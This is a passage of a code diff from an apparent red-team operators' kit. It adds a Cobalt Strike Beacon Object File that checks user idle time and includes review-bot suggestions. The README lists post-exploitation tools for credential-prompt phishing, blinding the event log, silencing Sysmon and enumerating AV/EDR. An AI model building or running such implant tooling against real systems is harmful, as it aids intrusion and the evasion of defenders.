+    lii.cbSize = sizeof(LASTINPUTINFO);
+    USER32$GetLastInputInfo(&lii);
+
+    DWORD currentTime = KERNEL32$GetTickCount();
+    DWORD lastInputTime = lii.dwTime;
+
+    return (currentTime - lastInputTime) / 1000;
+}
+
+void FormatIdleTime(DWORD idleTime, int *hours, int *minutes, int *seconds) {
+    *hours = idleTime / 3600;
+    *minutes = (idleTime % 3600) / 60;
+    *seconds = idleTime % 60;
+}
+
+
+int go() {
+    DWORD idleTime = GetIdleTimeInSeconds();
+	
+	int hours, minutes, seconds;
+    FormatIdleTime(idleTime, &hours, &minutes, &seconds);
+	
+    BeaconPrintf(CALLBACK_OUTPUT,"[+] Last user input was observed %02d:%02d:%02d ago.\n", hours, minutes, seconds);
+    return 0;
+}
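Review bot: `GetIdleTimeInSeconds` ignores the `BOOL` returned by `USER32$GetLastInputInfo`, so on failure `lii.dwTime` is read uninitialised and `go` reports a meaningless duration as if it were real. Return a sentinel on failure and have `go` report it through `CALLBACK_ERROR` instead of printing garbage; the unsigned subtraction is already correct across the `GetTickCount` wrap, which deserves a comment. It is also worth noting on the function that, per the Win32 documentation, `GetLastInputInfo` reflects input for the calling session only — confirm against the intended use.
```c
DWORD GetIdleTimeInSeconds() {
    LASTINPUTINFO lii;
    lii.cbSize = sizeof(LASTINPUTINFO);
    // dwTime is only defined when the call succeeds; signal failure with UINT_MAX
    // (documented as session-specific: input in other sessions is not reflected)
    if (!USER32$GetLastInputInfo(&lii)) {
        return (DWORD)-1;
    }
    // unsigned subtraction stays correct across the GetTickCount wrap-around
    return (KERNEL32$GetTickCount() - lii.dwTime) / 1000;
}

// … unchanged: FormatIdleTime …

int go() {
    DWORD idleTime = GetIdleTimeInSeconds();
    if (idleTime == (DWORD)-1) {
        BeaconPrintf(CALLBACK_ERROR, "[-] GetLastInputInfo failed.\n");
        return 0;
    }
    // … unchanged: FormatIdleTime call and output …
}
```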

+ 18 - 0
KIT/IdleTime/idletime.cna

@@ -0,0 +1,18 @@
+# author REDMED-X
+
+beacon_command_register(
+	"idletime", "Check current user activity based on the user's last input",
+	"INFO:\nCheck current user activity based on the user's last input. Returns the time in format HH:MM:SS.\n\n" .
+	"USAGE:\nidletime\n\n");
+	
+alias idletime {
+    $bid = $1;
+
+    # Read in the right BOF file
+    $handle = openf(script_resource("idletime.o"));
+    $data = readb($handle, -1);
+    closef($handle);
+
+	blog($bid, "Tasked to check user activity..");
+    beacon_inline_execute($bid, $data, "go", $null);
+}

+ 5 - 0
KIT/IdleTime/idletime.h

@@ -0,0 +1,5 @@
+#include <windows.h>  
+
+DECLSPEC_IMPORT BOOL WINAPI USER32$GetLastInputInfo(PLASTINPUTINFO plii);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetTickCount(void);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...);
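Review bot: `MSVCRT$printf` is declared here but `idletime.c` never calls it (all output goes through `BeaconPrintf`), so the declaration is dead and, if the symbol were ever referenced by accident, it would resolve at BOF load time rather than being caught by the compiler. Drop the line, or if it is kept for local debugging mark it `/* debug only; not used by idletime.c */`. A short comment on `USER32$GetLastInputInfo` that it `/* returns FALSE on failure; plii->dwTime is then undefined */` would document the contract the caller needs.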

BIN
KIT/IdleTime/idletime.o


+ 4 - 1
README.md

@@ -9,16 +9,19 @@ The following tools are currently in the operators' kit:
 |**[AddLocalCert](KIT/AddLocalCert)**|Add a (self signed) certificate to a specific local computer certificate store.|
 |**[AddTaskScheduler](KIT/AddTaskScheduler)**|Create a scheduled task on the current- or remote host.|
 |**[BlindEventlog](KIT/BlindEventlog)**|Blind Eventlog by suspending its threads.|
+|**[CredPrompt](KIT/CredPrompt)**|Start persistent credential prompt in an attempt to capture user credentials.|
 |**[DelLocalCert](KIT/DelLocalCert)**|Delete a local computer certificate from a specific store.|
 |**[DelTaskScheduler](KIT/DelTaskScheduler)**|Delete a scheduled task on the current- or a remote host.|
-|**[DllEnvHijacking](KIT/DllEnvHijacking)**|BOF implementation of DLL environment hijacking published by [Wietze](https://www.wietzebeukema.nl/blog/save-the-environment-variables) |
+|**[DllEnvHijacking](KIT/DllEnvHijacking)**|BOF implementation of DLL environment hijacking published by [Wietze](https://www.wietzebeukema.nl/blog/save-the-environment-variables).|
 |**[EnumLocalCert](KIT/EnumLocalCert)**|List all local computer certificates from a specific store.|
+|**[EnumSecProducts](KIT/EnumSecProducts)**|List security products (like AV/EDR) that are running on the system.|
 |**[FindDotnet](KIT/FindDotnet)**|Find processes that most likely have .NET loaded.|
 |**[FindHandle](KIT/FindHandle)**|Find "process" and "thread" handle types between processes.|
 |**[FindLib](KIT/FindLib)**|Find loaded module(s) in remote process(es).|
 |**[FindRWX](KIT/FindRWX)**|Find RWX memory regions in a target process.|
 |**[FindSysmon](KIT/FindSysmon)**|Verify if Sysmon is running through enumerating Minifilter drivers and checking the registry.|
 |**[HideFile](KIT/HideFile)**|Hide file or directory by setting it's attributes to systemfile + hidden.|
+|**[IdleTime](KIT/IdleTime)**|Check current user activity based on the user's last input.|
 |**[LoadLib](KIT/LoadLib)**|Load an on disk present DLL via RtlRemoteCall API in a remote process.|
 |**[PSremote](KIT/PSremote)**|List all running processes on a remote host.|
 |**[SilenceSysmon](KIT/SilenceSysmon)**|Silence the Sysmon service by patching its capability to write ETW events to the log.|